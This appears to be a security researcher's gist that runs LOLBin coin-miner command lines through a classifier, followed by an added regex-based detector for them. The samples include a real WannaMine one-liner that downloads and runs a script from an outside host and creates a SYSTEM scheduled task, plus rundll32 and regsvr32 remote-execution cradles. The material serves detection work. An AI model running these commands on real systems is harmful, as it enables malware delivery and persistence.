
@holisticinfosec
Created December 28, 2021 05:15
LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS coin miner commands from https://lolbas-project.github.io/
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute
# References:
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/
from lol.api import LOLC, PlatformType

# Classifier for Windows command lines; PlatformType.LINUX is the other allowed parameter.
lolc = LOLC(PlatformType.WINDOWS)

# Raw strings keep the backslashes in the Windows paths and WMI namespaces intact
# (plain strings would turn "\S", "\." and "\y" into invalid escape sequences).
commands = [
    # WannaMine one-liner: check for its WMI subscription persistence, fetch the stager, schedule a task
    r'cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yastcat',
    # LOLBAS rundll32 execute: javascript: protocol handler with mshtml,RunHTMLApplication
    r'rundll32.exe javascript:\..\mshtml,RunHTMLApplication;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://ip:port/);',
    # LOLBAS regsvr32 execute: remote scriptlet via /i:<url> with scrobj.dll
    r'regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll',
]

classification, tags = lolc(commands)
for command, status, tag in zip(commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("")
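Where the `lol` package is not available, the same three command lines can be triaged with plain rule matching over process-creation command lines (Sysmon Event ID 1 or Security 4688, which the LogRhythm reference above explains how to enable). The block below is an added example, not part of the gist and not the `lol` library's classifier: the rule names and regular expressions are my own assumptions modelled on the LOLBAS rundll32 and regsvr32 execute entries and on the WannaMine one-liner; the three sample commands are the gist's, and the benign regsvr32/rundll32 lines are constructed to show that ordinary use of those binaries does not fire.

```python
# Added example: rule-based triage of LOLBin command lines (not the gist's code,
# not the `lol` package). Intended for command lines pulled from Sysmon EID 1
# or Security 4688 events.
import re
from typing import Dict, List, Tuple

# Rule tag -> compiled, case-insensitive regex over the whole command line.
# Tags and patterns are assumptions for this example, not LOLC's labels.
RULES: Dict[str, "re.Pattern[str]"] = {
    # rundll32 invoked with the javascript: handler (LOLBAS Rundll32 #execute)
    "rundll32_javascript": re.compile(r"rundll32(\.exe)?\s+javascript:", re.I),
    # regsvr32 pulling a remote scriptlet via /i:<url> with scrobj.dll (LOLBAS Regsvr32 #execute)
    "regsvr32_remote_sct": re.compile(r"regsvr32(\.exe)?.*?/i:https?://.*?scrobj\.dll", re.I),
    # PowerShell download cradle: IEX over Net.WebClient.DownloadString
    "ps_download_cradle": re.compile(
        r"IEX\s*\(?\s*New-Object\s+Net\.WebClient\)?\s*\.DownloadString", re.I),
    # Scheduled-task creation from inside a one-liner (WannaMine persistence)
    "schtasks_persistence": re.compile(r"schtasks\s+/create\b", re.I),
    # Enumeration of WMI event subscriptions (WannaMine checks its own persistence)
    "wmi_subscription_query": re.compile(
        r"root\\Subscription.*__FilterToConsumerBinding", re.I),
}

# The three command lines from the gist (unchanged), as sample input.
SAMPLE_COMMANDS: List[str] = [
    r'cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yastcat',
    r'rundll32.exe javascript:\..\mshtml,RunHTMLApplication;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://ip:port/);',
    r'regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll',
]

# Constructed benign uses of the same binaries; none of the rules should fire.
BENIGN_COMMANDS: List[str] = [
    r'regsvr32 /s C:\Windows\System32\example.dll',
    r'rundll32.exe shell32.dll,Control_RunDLL',
]


def classify(command: str) -> List[str]:
    """Return the sorted rule tags matching one command line ([] if none)."""
    return sorted(tag for tag, rx in RULES.items() if rx.search(command))


def classify_all(commands: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Mirror LOLC's (command, status, tags) shape: status is 'lolbin' or 'benign'."""
    results = []
    for cmd in commands:
        tags = classify(cmd)
        results.append((cmd, "lolbin" if tags else "benign", tags))
    return results


if __name__ == "__main__":
    for command, status, tag in classify_all(SAMPLE_COMMANDS + BENIGN_COMMANDS):
        print(command)
        print(status)
        print(tag)
        print("")
```

The `ps_download_cradle` and `schtasks_persistence` rules are the ones worth tuning in a real environment: both can appear in legitimate administration, so they are most useful as tags that raise the score of a rundll32 or regsvr32 hit rather than as stand-alone alerts.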